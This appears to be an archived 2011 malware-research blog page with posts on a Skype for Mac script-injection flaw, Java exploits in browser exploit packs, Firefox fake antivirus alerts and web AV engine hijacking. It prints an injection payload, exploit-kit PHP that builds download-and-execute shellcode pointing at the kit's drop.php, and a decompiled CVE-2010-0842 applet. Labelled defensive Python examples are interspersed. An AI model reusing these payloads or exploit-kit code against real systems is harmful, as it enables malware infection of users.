An Official Malware Research Blog of SecNiche Security Labs. Analysis, straight from the hidden and underground.
Tuesday, May 24, 2011
Friday, May 20, 2011
HackInTheBox AMS - Spying on SpyEye
We presented a talk regarding our research on SpyEye at HackInTheBox security conference. Thanks to Rohit for all his support and working with me on this research.
You can fetch the presentation from HackInTheBox Security Conference Website.
Tuesday, May 10, 2011
DoD CrossTalk - Browser UI Design Flaws
We have just published our paper "Browser UI Interface Design Flaws" in the Department of Defense CrossTalk journal. Have a nice read.
Saturday, May 7, 2011
Skype IM (Mac OS X) - Is this the 0day?
Recently we came across news of a Skype 0-day that results in remote exploitation on Mac OS X. We had discovered the same pattern of vulnerability in Skype two months ago. For testing reasons we did not go through the process of reporting it to the vendor, because we were looking at the malware angle of this vulnerability (whether it can be exploited to download malware onto Mac OS X).
First, we are not sure whether the researchers are talking about the same vulnerability, because we have seen the news but the vulnerability details are missing everywhere. So our team decided to take a step in this direction and present the details of the vulnerability we discovered in Skype running on Mac OS X.
Discussion:
JavaScript is used extensively on all web related platforms, and the Skype client on Mac OS X uses it too (most chat clients do, so that is no big deal). This vulnerability does not affect Skype running on Windows or Linux. Skype fails to differentiate between the payloads that are sent as hyperlinks in the chat window. Only legitimate users in the victim's contact list can exploit it; the attacker only requires a suitable payload to trigger the issue. Basically, we call it Skype Remote Scripting (Injection).
Working:
In order to trigger this vulnerability, one needs a vulnerable website that can act as the carrier for the payload. For example, an attacker can use a third-party vulnerable website to trigger script injection in Skype (Mac OS X). Generally, the following holds:
1. If an attacker sends a remote script payload as [script]alert(document.location);[script], Skype filters this injection in the chat engine, which is quite normal. We use square brackets here for representation; a real injection would use angle brackets as in XSS payloads.
2. Skype (Mac OS X) fails to filter the injection when the payload is sent as part of a third-party vulnerable website's hyperlink, as follows:
http://www.vulnerablewebsite.com/index.php?url=[script]alert(document.location);[script]
A = http://www.vulnerablewebsite.com/index.php?url=
B = [script]alert(document.location);[script]
Skype fails to treat it as one hyperlink (A+B). As a result, the B part executes in the context of Skype (Mac OS X), resulting in remote scripting in Skype.
3. An attacker can use DOM injection to write arbitrary content into the chat window. Advanced variations of this are possible.
4. Since Mac OS X runs applications with the .app extension, it is possible to download malicious applications through Skype. One can also launch Safari automatically using DOM calls such as "window.open".
5. This vulnerability does not require any user interaction and runs the payload directly. One has to be careful, because it can execute content in both chat windows if both attacker and victim are using Skype (Mac OS X). The attacker can use Skype on Windows or Linux to carry out this attack.
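To make the failure mode concrete from the defender's side, here is an added Python example (not code from this post or from Skype) contrasting a chat-message linkifier that ends the hyperlink at the first angle bracket and copies the remainder into the HTML untouched, which is the A+B split described above, with a hardened renderer that keeps the whole token as the link and HTML-escapes every part. The messages and the host example.com are constructed.

```python
import html
import re

# Constructed messages (not from the original post); example.com stands in for the
# third-party "vulnerable website" that carries the payload in the write-up.
SAFE_MSG = "look at http://example.com/index.php?url=docs"
ATTACK_MSG = "http://example.com/index.php?url=<script>alert(document.location);</script>"

# Vulnerable behaviour: the link match stops at the first angle bracket, so the
# A part becomes the hyperlink and the B part is emitted as live markup.
URL_PREFIX = re.compile(r"https?://[^\s<>]+")
# Hardened behaviour: the link is the whole whitespace-delimited token, A+B together.
URL_TOKEN = re.compile(r"https?://\S+")


def render_vulnerable(message: str) -> str:
    out, pos = [], 0
    for m in URL_PREFIX.finditer(message):
        out.append(message[pos:m.start()])                    # plain text left raw
        out.append('<a href="%s">%s</a>' % (m.group(0), m.group(0)))
        pos = m.end()
    out.append(message[pos:])                                 # remainder left raw
    return "".join(out)


def render_hardened(message: str) -> str:
    out, pos = [], 0
    for m in URL_TOKEN.finditer(message):
        out.append(html.escape(message[pos:m.start()]))       # escape plain text
        link = html.escape(m.group(0), quote=True)            # escape href and label
        out.append('<a href="%s">%s</a>' % (link, link))
        pos = m.end()
    out.append(html.escape(message[pos:]))
    return "".join(out)


def leaks_markup(rendered: str) -> bool:
    """True if anything besides the generated <a> element survived as live markup."""
    stripped = re.sub(r'<a href="[^"]*">|</a>', "", rendered)
    return "<" in stripped
```

For the safe message both renderers produce the same HTML; only the hardened one keeps the payload inert.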
Some of the PoCs are presented in the snapshots below, which show the execution of this vulnerability.
Injection 1:
Injection 2:
Injection 3:
This is really devastating from a security point of view. All versions before 5.1.0.922 are vulnerable. However, we still think variations of this type of issue are possible and the vulnerable versions can be exploited differently. Since it executes scripts, we can say that this vulnerability could be used in worm infections.
Is this the 0-day Skype bug? Let's see what the other researchers release.
Wednesday, May 4, 2011
Finest 5 - Java Exploits on Fire
Since the origin of browser exploit packs, we have noticed a serious change in the effectiveness of exploitation due to the appearance of critical vulnerabilities. Recently we have observed the explicit use of Java vulnerabilities by Browser Exploit Packs (BEPs). Java has become the most prominent exploitation vector nowadays. BEPs such as BlackHole and Phoenix use Java exploits explicitly for triggering infections. Consequently, the highest infection rates are an outcome of these Java exploits.
Java, being platform independent, is the preferred choice of attackers for attacking victim machines. The Java exploits that are on fire are as follows:
1. Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840)
2. Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (CVE-2010-0842) | Java JMF MIDI
3. Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886)
4. Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI
5. Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423)
The latest addition to the Java exploit set is CVE-2010-4452, a flaw within the findClass method of the sun.plugin2.applet.Applet2ClassLoader class.
Serving these exploits is quite easy: the kit simply pushes the JAR file as follows (square brackets stand in for angle brackets in the HTML):
[object id="java_obj" classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0"]
[PARAM name="launchjnlp" value="1"]
[PARAM name="docbase" value="]
[/object]
[embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="';
include '../config.php';
include '../include/shellcode.php';
$shellcode = shellcode_dl_exec ($config_url . '/drop.php?e=Java-2010-0842');
$rmf = 'IREZ' . 'SONGmSËm' . ' ' . '' . '' . 'ITLŸ±µ
~ûpœ†þ°5' . '“â^Þ÷' . 'ÿ' . '' . '8ÿ ÉPQRSVW' . $shellcode;
header ('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
header ('Cache-Control: no-cache');
header ('Pragma: no-cache');
header ('Accept-Ranges: bytes');
header ('Content-Length: ' . strlen ($rmf) . '');
header ('Content-Disposition: inline; filename=midi20100842.rmf');
header ('');
header ('Content-Type: application/x-msdownload');
So we cannot ignore how easy it is to spread malware by exploiting Java vulnerabilities. For example, consider the exploit trigger below:
include_once 'config.php';
echo ' [Applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1"]
[PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
[/applet]';
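The two fragments above give a defender concrete markers. Here is an added Python example (not code from this post or from any exploit kit) that flags the delivery side of this pattern in constructed samples: Java applet/object/embed elements sized to be invisible, a launchjnlp parameter, and an .rmf file served as application/x-msdownload with the RMF "IREZ" magic, as on the CVE-2010-0842 page shown. The host kit.invalid and the sample bytes are constructed.

```python
import re

# Constructed samples modelled on the exploit-kit fragments quoted above (not the kit's own files).
HTML_SAMPLE = (
    '<object id="java_obj" classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0">'
    '<PARAM name="launchjnlp" value="1"></object>'
    '<Applet Code="ToolsDemo.class" archive="http://kit.invalid/Java-2010-0842.jar" width="0" Height="1">'
    '<PARAM NAME="URL" VALUETYPE="ref" VALUE="http://kit.invalid/helper.php"></applet>'
)
CLEAN_HTML = '<applet code="Chess.class" archive="chess.jar" width="400" height="300"></applet>'
RESP_HEADERS = {"Content-Disposition": "inline; filename=midi20100842.rmf",
                "Content-Type": "application/x-msdownload"}
RESP_BODY = b"IREZ\x00\x00\x00\x01SONG" + b"\x90" * 16   # constructed, starts with the RMF magic

TAG = re.compile(r"<(applet|object|embed)\b([^>]*)>", re.I)
ATTR = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')


def java_delivery_findings(doc: str) -> list:
    """Flag Java elements sized to be invisible and launchjnlp use, the kit's delivery pattern."""
    findings = []
    for m in TAG.finditer(doc):
        tag = m.group(1).lower()
        attrs = {k.lower(): v for k, v in ATTR.findall(m.group(2))}
        is_java = (tag == "applet"
                   or attrs.get("classid", "").lower().startswith("clsid:cafeefac")
                   or attrs.get("type") == "application/x-java-applet")
        hidden = attrs.get("width") == "0" or attrs.get("height") in ("0", "1")
        if is_java and hidden:
            findings.append(f"hidden {tag}: {attrs.get('archive') or attrs.get('classid', '?')}")
        # launchjnlp may sit on the element itself or in a PARAM directly after it
        if "launchjnlp" in attrs or "launchjnlp" in doc[m.end():m.end() + 120].lower():
            findings.append(f"{tag}: launchjnlp present (Deployment Toolkit launch)")
    return findings


def rmf_delivery_findings(headers: dict, body: bytes) -> list:
    """Flag an RMF file served with an executable MIME type, as on the kit's MIDI exploit page."""
    findings = []
    h = {k.lower(): v for k, v in headers.items()}
    fname = re.search(r"filename=([^;\s]+)", h.get("content-disposition", ""))
    if (fname and fname.group(1).lower().endswith(".rmf")
            and h.get("content-type") == "application/x-msdownload"):
        findings.append("RMF filename served as application/x-msdownload")
    if body.startswith(b"IREZ"):
        findings.append("body carries RMF magic 'IREZ'")
    return findings
```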
On decompiling Java-2010-0842.jar, we get
import java.applet.Applet;
import java.io.*;
import javax.sound.midi.*;

public class ToolsDemo extends Applet
{
    public ToolsDemo(){}

    public void init()
    {
        // The "URL" applet parameter names the resource holding the crafted RMF data
        String s = getParameter("URL");
        try
        {
            InputStream inputstream = getClass().getResourceAsStream(s);
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
            byte abyte0[] = new byte[1024];
            int i;
            while((i = inputstream.read(abyte0)) != -1)
                bytearrayoutputstream.write(abyte0, 0, i);
            ByteArrayInputStream bytearrayinputstream = new ByteArrayInputStream(bytearrayoutputstream.toByteArray());
            ToolsDemoSubClass toolsdemosubclass = new ToolsDemoSubClass();
            // The crafted sequence is handed to the MixerSequencer (CVE-2010-0842)
            javax.sound.midi.MidiDevice.Info ainfo[] = MidiSystem.getMidiDeviceInfo();
            MidiDevice mididevice = MidiSystem.getMidiDevice(ainfo[0]);
            Sequencer sequencer = null;
            sequencer = (Sequencer)mididevice;
            sequencer.open();
            sequencer.setSequence(bytearrayinputstream);
            sequencer.addControllerEventListener(toolsdemosubclass, new int[] {
                0
            });
            sequencer.start();
        }
        catch(Exception exception) { }
    }

    public String getAppletInfo(){return "Tools Demo";}
}
Something is really on fire :)
Tuesday, May 3, 2011
Firefox Fake AV Alerts - Malware Trigger
Malware writers are opting for aggressive techniques to infect users with malicious programs. Browsers have always been the prime exploitation paradigm, and what could be better than anti-virus alerts in the browser? The recent trend encompasses manipulation of Firefox (other browsers are supported too) to trigger malicious AV alerts, thereby forcing the user to download a malicious executable. For security researchers, detecting these alerts is not a hard task. However, normal users find themselves in havoc from the fear of being infected when they face these malicious alerts. In fact, this process exploits the ignorance, or one can say the fear, of users through social engineering tricks. In order to remove the malware reported by the fake alert notifications, users intentionally install a malicious program on their machines.
Generally, these alerts are not browser specific but browser independent. It is also possible that these alerts trigger only when User Agent Based Fingerprinting (USBF) is done. There are many scenarios. The snapshot below shows how Firefox is manipulated:
On a successful scan, it alerts on a lot of security issues, reporting the presence of trojans, backdoors, rootkits and so on, despite the hilarious fact that your system-level AV engine stays calm. Well, visualization of threats has its own implication. On completion of the scan, these alerts force users to install the following file (specific to the domain we are analyzing):
Further, Mozilla's built-in bad site reporting service works together with stopbadware.org. When the user ignores the warning, Firefox redirects to the legitimate domain (stopbadware.org). That is something we all know.
[REQUEST]
GET /?hl=en-US&url=http%3A%2F%2Fupdate82.sashrod.ce.ms%2Findex.php%3FQ1Xhk9SJbYJGPXpjM%2
FtL5is7E974ZjcioT7yKQchpNjVUC%2B1hEwpaVGuq1zgdVqksMShxC9dHBs
2rpwYqQjCVkTeZbDJDe1pKU0ChURY HTTP/1.1
Host en-us.malware-error.mozilla.com
User-Agent Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 ( .NET CLR 3.5.30729; .NET4.0C)
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language en-us,en;q=0.5
Accept-Encoding gzip,deflate
Accept-Charset ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive 115
DNT 1
Connection keep-alive
[RESPONSE]
(Status-Line) HTTP/1.1 302 Found
Date Tue, 03 May 2011 22:28:08 GMT
Server Apache
X-Backend-Server pm-web02
Location http://www.stopbadware.org/firefox?hl=en-US&
url=http%3A%2%2Fupdate82.sashrod.ce.ms%2Findex.php%3FQ1Xhk9SJbYJGP
XpjM%2FtL5is7E974ZjcioT7yKQchpNjVUC%2B1hEwpaVGuq1zgdVqksMS
hxC9dHBs2rpwYqQjCVkTeZbDJDe1pKU0ChURY
Content-Length 394
Keep-Alive timeout=20, max=996
Connection Keep-Alive
Content-Type text/html; charset=iso-8859-1
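To turn a capture like the one above into something a SOC can act on, here is an added Python example (not from the original post) that walks constructed proxy log entries in the shape of that request/response, pulls the blocked page out of the url= parameter of the malware-error request, and checks that the 302 lands on stopbadware.org as described. The log entries are constructed; the flagged URL is the one from the capture with its encoded tail shortened.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log entries: (host, request line, status, Location header).
PROXY_LOG = [
    ("en-us.malware-error.mozilla.com",
     "GET /?hl=en-US&url=http%3A%2F%2Fupdate82.sashrod.ce.ms%2Findex.php%3FQ1Xhk9SJbYJ HTTP/1.1",
     302,
     "http://www.stopbadware.org/firefox?hl=en-US&url=http%3A%2F%2Fupdate82.sashrod.ce.ms%2Findex.php%3FQ1Xhk9SJbYJ"),
    ("www.example.org", "GET /index.html HTTP/1.1", 200, None),
]


def flagged_url(host: str, request_line: str):
    """The url= parameter of a malware-error request is the page Firefox blocked."""
    if not (host == "malware-error.mozilla.com" or host.endswith(".malware-error.mozilla.com")):
        return None
    target = request_line.split(" ")[1]                      # request-target of the request line
    values = parse_qs(urlsplit(target).query).get("url")      # parse_qs percent-decodes the value
    return values[0] if values else None


def redirect_ok(status: int, location) -> bool:
    """The ignore-warning hop should land on stopbadware.org and nowhere else."""
    if status != 302 or not location:
        return False
    h = urlsplit(location).hostname or ""
    return h == "stopbadware.org" or h.endswith(".stopbadware.org")


def blocked_hosts(log) -> list:
    """Hosts Firefox reported as malware, each paired with whether the redirect looked legitimate."""
    hits = []
    for host, request_line, status, location in log:
        url = flagged_url(host, request_line)
        if url:
            hits.append((urlsplit(url).hostname, redirect_ok(status, location)))
    return hits
```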
This discussion clearly indicates how badly browsers are being manipulated. Consequently, browsers are always at stake, and so are users, despite our protection efforts.
Monday, May 2, 2011
Reverse Hijacking Web AV Engines
Web anti-virus engines are used explicitly to perform behavioral analysis on active malware. Is it possible to run a controlled binary in order to trace all the information about the cloud infrastructure of virtual machines that collaboratively analyze malicious executables? We have proved in the past that it is possible to hijack (extract information from) the hidden servers in the cloud used for malware analysis.
The technique discussed in the white paper can be used in different scenarios to trick internal VMware servers into leaking sensitive information and thereby attack in return. Goodwill Hunting :)
Reverse hacking proves beneficial in many scenarios.